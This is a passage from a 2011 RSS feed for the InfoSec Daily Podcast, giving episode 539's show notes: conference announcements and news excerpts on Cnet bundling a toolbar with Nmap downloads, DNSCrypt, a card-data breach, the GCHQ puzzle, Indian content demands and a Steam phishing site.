	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Secret location in Chicago</span><br />
	<a href="http://tickets.thotcon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://tickets.thotcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.theregister.co.uk/2011/12/06/cnet_nmap_toolbar_wrapping_row/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/06/cnet_nmap_toolbar_wrapping_row/</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cnet has come under fire for wrapping downloads of the popular Nmap network analysis tool and other open-source software packages with a toolbar of dubious utility.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nmap is a popular open-source network auditing and penetration-testing tool that allows sysadmins to run network troubleshooting and penetration tests. Over the last few days, users who have downloaded the tool from Cnet popular download.com site have been, by default, offered it in conjunction with the Babylon Toolbar.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sysadmins can opt out of receiving the toolbar, which changes their browsing experience, home page and default search engines, but they are clearly directed towards accepting the software, as a blog post by</span><a href="http://nakedsecurity.sophos.com/2011/12/06/popular-security-tool-nmap-at-the-middle-of-a-security-brouhaha/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Sophos</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> illustrates.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Gordon Lyon (Fyodor), the developer of Nmap, has cried foul over the way the toolbar has been pushed, objecting in a</span><a href="http://seclists.org/nanog/2011/Dec/160"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">post</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to the North American Network Operators&#39; Group (Nanog) mailing list (extract below).</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The problem is that users often just click through installer screens, trusting that download.com gave them the real installer and knowing that the Nmap project wouldn&#39;t put malicious code in our installer. Then the next time the user opens their browser, they find that their computer is hosed with crappy toolbars, Bing searches, Microsoft as their home page, and whatever other shenanigans the software performs! The worst thing is that users will think we (Nmap Project) did this to them!</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lyon added that consumers downloading VLC, the popular open-source media player software, are also being offered the Babylon toolbar, via what he described as a a &quot;Trojan installer&quot;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.readwriteweb.com/enterprise/2011/12/opendns-adds-encrypted-securit.php"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.readwriteweb.com/enterprise/2011/12/opendns-adds-encrypted-securit.php</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">OpenDNS announced a technology preview today for Macs running their DNS services called DNSCrypt. Think of this as doing for the DNS protocol what HTTPS does for the Web protocols. Like its mainline service, it is freely available, and Windows and Linux versions are promised for next year. You can</span><a href="http://www.opendns.com/technology/dnscrypt/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">download the code here</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> for the Mac OS. They will eventually post all of their code on GitHub for public scrutiny.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DNSCrypt solves one critical flaw in the DNS process: the ability to snoop as a &quot;man in the middle&quot; of a conversation between two computers, because it encrypts all DNS traffic between your computer and the Internet. This is a real concern, and there have been several exploits lately that took advantage of DNS requests, because the vast majority of them are issued in the clear. (Just like most emails.)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The version of DNSCrypt that is available is a &quot;preview&quot; meaning that it could have problems in daily use. We haven&#39;t yet tried it.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DNSCrypt isn&#39;t the only game in town, and for years an effort called DNSSEC has been trying to take hold for increased DNS security. DNSSEC solves a larger problem: not only does it provided an encrypted channel, but also adds authentication and a chain of trust to ensure that the expected DNS record hasn&#39;t been tampered with. They can be used together. Sadly, few sites have implemented it to date.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://news.softpedia.com/news/International-Checkout-Hacker-Customer-Credit-Cards-Abused-238650.shtml"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/International-Checkout-Hacker-Customer-Credit-Cards-Abused-238650.shtml</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">International Checkout customers began receiving emails that alert them on the fact that the organization has recently fallen victim to a cyberattack which resulted in the theft of a large quantity of personal information, including credit card details.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;International Checkout was recently the victim of a system intruder who was able to access encrypted credit card information,&rdquo; reads the email provided by</span><a href="http://msmvps.com/blogs/spywaresucks/archive/2011/12/06/1803282.aspx?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed:+SpywareSucks+%28Spyware+Sucks%29&amp;utm_content=Google+Reader"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> SpywareSucks</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;You are receiving this email from International Checkout because your credit card information was in the database which was compromised.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It seems as the breach was discovered sometime in mid-September and an investigation has immediately commenced. Besides the fact that the authorities were notified of the issue, the credit card information from the databases was removed to make sure no one still had access.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Even though the information was encrypted, the attacker managed to obtain the encryption key that was stored in a separate location.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;As a precaution, International Checkout is providing notification to people whose information may have been in the database that was accessed so that if it turns out the information was compromised in any way, they can take the appropriate measures to protect themselves,&rdquo; the notification adds.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.theregister.co.uk/2011/12/06/hidden_gchq_code_breaking_challenge/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/06/hidden_gchq_code_breaking_challenge/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Codebreakers are split over whether there might be a hidden challenge in the GCHQ-set code-breaking puzzle set last week.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The signals intelligence agency set a puzzle at</span><a href="http://canyoucrackit.co.uk/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">canyoucrackit.co.uk</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> in its attempt to drum up potential interest in a career at the spy centre from outside its traditional graduate programme. The three-part puzzle was broken independently by several people, but Dr Gareth Owen, a computer scientist and senior lecturer at the University of Greenwich in England, was the first to post a</span><a href="http://gchqchallenge.blogspot.com/2011/12/gchq-stage-1-commented-assembly-code-dr.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">detailed explanation</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> of the crack.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The challenge involved making uncovering a code-word starting with a 16&#215;10 grid of paired hexadecimal numbers. The first stage involves recognising that the numbers are executable code (a decryption algorithm) as well as unpicking some steganography involving the image of the numbers. The second stage involves building a virtual computer to execute code that, when correctly done, outputs the link to the third stage.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The third stage involves finding the licence key to run a linked program. Finding the licence key involves decoding the program and seeing how it works. Three hidden numbers from the first two stages of the process are needed to get the final answer that reveals the keyword.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Other amateur codebreakers who also tried their hand at the codebreaking challenge included John Graham-Cumming, the man behind the project to build Charles Babbage&#39;s Analytical Engine. Graham-Cumming also launched the successful petition for an apology from the British government for its persecution of Alan Turing.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.pcadvisor.co.uk/news/internet/3322974/inida-calls-for-facebookgoogle-remove-offensive-content"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcadvisor.co.uk/news/internet/3322974/inida-calls-for-facebookgoogle-remove-offensive-content</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Indian government is calling for Facebook, Google and other web firms to remove offensive content.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Communications Minister Kapil Sibal said any &quot;inflammatory&quot; and &quot;defamatory&quot; content covering religion and politics that could create social tension should be removed or the web giants, which also include Yahoo and YouTube, will face &quot;stern action&quot;. It is thought Sibal in particular objects to comments and images of Congress president Sonia Gandhi and Prime Minister Manmohan Singh.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;These websites have been told to be more vigilant towards such content and ensure that such objectionable matter is not used on the Internet,&quot; a senior official of the Department of Telecommunications told</span><a href="http://www.thehindu.com/news/national/article2690084.ece"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">The Hindu</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;They have been asked to inform the government of such controversial matter so that immediate remedial measures could be taken. We have asked them to actively screen and filter all such material before they are uploaded.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Facebook, which has 28 million users in India, said in a statement it &quot;will remove any content that violates our terms, which are designed to keep material that is hateful, threatening, incites violence or contains nudity off the service&quot;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/Steam-s-Birthday-Celebrated-by-Phishers-238586.shtml"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Steam-s-Birthday-Celebrated-by-Phishers-238586.shtml</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">English and German speaking Steam customers are advised to beware of a website that allegedly offers an anniversary upgrade. In reality, the site is carefully designed by phishers to steal the login details of unsuspecting users, reports</span><a href="http://sunbeltblog.blogspot.com/2011/12/steam-birthday-crashed-by-party-poopers.html?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed:+SunbeltBlog+%28GFI+Blog%29&amp;utm_content=Google+Reader"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">GFI</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Valve gives to you one of 1000 available Steam-gold-account upgrades which allow you to play all 72 games for free!&rdquo; reads the fake offer.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While the site (steambirthday.com) is well designed, most of the links being set up to point to legitimate Steam related locations, a big yellow </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">UPGRADE NOW</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> button that claims there are only 103 updates available will lead to a secondary malicious page that displays a form in which the victim is required to complete his log-in details.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Once the username, the password and the email address are provided, another form request a confirmation code received via email, this being the point where the crooks have everything they need to steal a Steam account.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;As the Steam-Project starten at September, 12th 2003 , no one had thaugt, that this system is that great. In a really short time our servers become more and more and today, there are more than thousand meters of them. The games became more and more, too. Today, we are on of the biggest companies with a great software to sell our multi-player games,&rdquo; reads a message on the main page of the phony site.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-539-nmap-malware-dnscrypt-international-checkout-gchq-india-facebook-steam/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3239/0/infosec-daily-podcast-episode-539.mp3" length="17832373" type="audio/mpeg" />
		<itunes:duration>0:37:06</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 539 for December 6, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rodstad and Themson Mester
&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 539 for December 6, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rodstad and Themson Mester
&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Thotcon 0&#215;3
	When: Friday April 27th, 2012
	Where: Secret location in Chicago
	http://tickets.thotcon.org/
	Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://www.theregister.co.uk/2011/12/06/cnet_nmap_toolbar_wrapping_row/

	Cnet has come under fire for wrapping downloads of the popular Nmap network analysis tool and other open-source software packages with a toolbar of dubious utility.
	Nmap is a popular open-source network auditing and penetration-testing tool that allows sysadmins to run network troubleshooting and penetration tests. Over the last few days, users who have downloaded the tool from Cnet popular download.com site have been, by default, offered it in conjunction with the Babylon Toolbar.
	Sysadmins can opt out of receiving the toolbar, which changes their browsing experience, home page and default search engines, but they are clearly directed towards accepting the software, as a blog post by Sophos illustrates.
	Gordon Lyon (Fyodor), the developer of Nmap, has cried foul over the way the toolbar has been pushed, objecting in a post to the North American Network Operators&#39; Group (Nanog) mailing list (extract below).
	The problem is that users often just click through installer screens, trusting that download.com gave them the real installer and knowing that the Nmap project wouldn&#39;t put malicious code in our installer. Then the next time the user opens their browser, they find that their computer is hosed with crappy toolbars, Bing searches, Microsoft as their home page, and whatever other shenanigans the software performs! The worst thing is that users will think we (Nmap Project) did this to them!
	Lyon added that consumers downloading VLC, the popular open-source media player software, are also being offered the Babylon toolbar, via what he described as a a &#34;Trojan installer&#34;.
	&#8230;.
	Source: &#160;http://www.readwriteweb.com/enterprise/2011/12/opendns-adds-encrypted-securit.php
	OpenDNS announced a technology preview today for Macs running their DNS services called DNSCrypt. Thin[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 538 &#8211; iPhone Exploit, Sentinel Lost, Amazon, Da Vinci, Zetas &amp; Nmap Malware</title>
		<link>http://www.isdpodcast.com/episode-538-iphone-exploit-sentinel-lost-amazon-da-vinci-zetas-nmap-malware</link>
		<comments>http://www.isdpodcast.com/episode-538-iphone-exploit-sentinel-lost-amazon-da-vinci-zetas-nmap-malware#comments</comments>
		<pubDate>Tue, 06 Dec 2011 01:55:17 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

